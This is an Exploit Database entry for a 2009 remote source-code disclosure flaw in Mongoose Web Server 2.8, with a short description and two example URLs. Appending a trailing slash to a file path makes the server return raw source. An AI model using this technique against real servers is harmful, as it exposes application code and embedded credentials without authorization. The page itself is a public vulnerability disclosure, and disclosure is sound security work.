Exploit Database - Logo

Mongoose Web Server 2.8 - Source Disclosure

EDB-ID: 9897 Author: Dr_IDE Published: 2009-10-23
CVE: CVE-2009-4535 Type: Webapps Platform: PHP
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: Download Vulnerable Application
« Previous Exploit Next Exploit » 
#######################################################
#
# Mongoose Web Server <= 2.8.0 Remote Source Disclosure
# Found By:	Dr_IDE
# Tested On:	Windows XPSP3
# Download: 	http://code.google.com/p/mongoose/
#
#######################################################

- Description -

Mongoose Web Server <= 2.8.0 is a Windows based HTTP server.
This is the latest version of the application available.

Mongoose is vulnerable to remote arbitrary source code
disclosure by the following means.

- Technical Details -

http://[ webserver IP][:port]/[ file ][/]

http://172.16.2.101:8080/index.html/
http://172.16.2.101:8080/index.php/

#[pocoftheday.blogspot.com]
« Previous Exploit Next Exploit »

Related Exploits

Trying to match CVEs (1): CVE-2009-4535
Trying to match OSVDBs (1): 61490
Trying to match setup file: 6099f06cf371b8da998651f1293e1a96
Other Possible E-DB Search Terms: Mongoose Web Server 2.8,  Mongoose Web Server
Date D V Title Author
2010-11-01 Verified Mongoose Web Server 2.11 - Directory Traversalnitr0us
2010-04-20 Verified Mongoose Web Server 2.8 - Multiple Directory TraversalsDr_IDE
2017-09-04 Waiting verification Mongoose Web Server 6.5 - Cross-Site Request Forgery / Remote Code Executionhyp3rlinx
Menu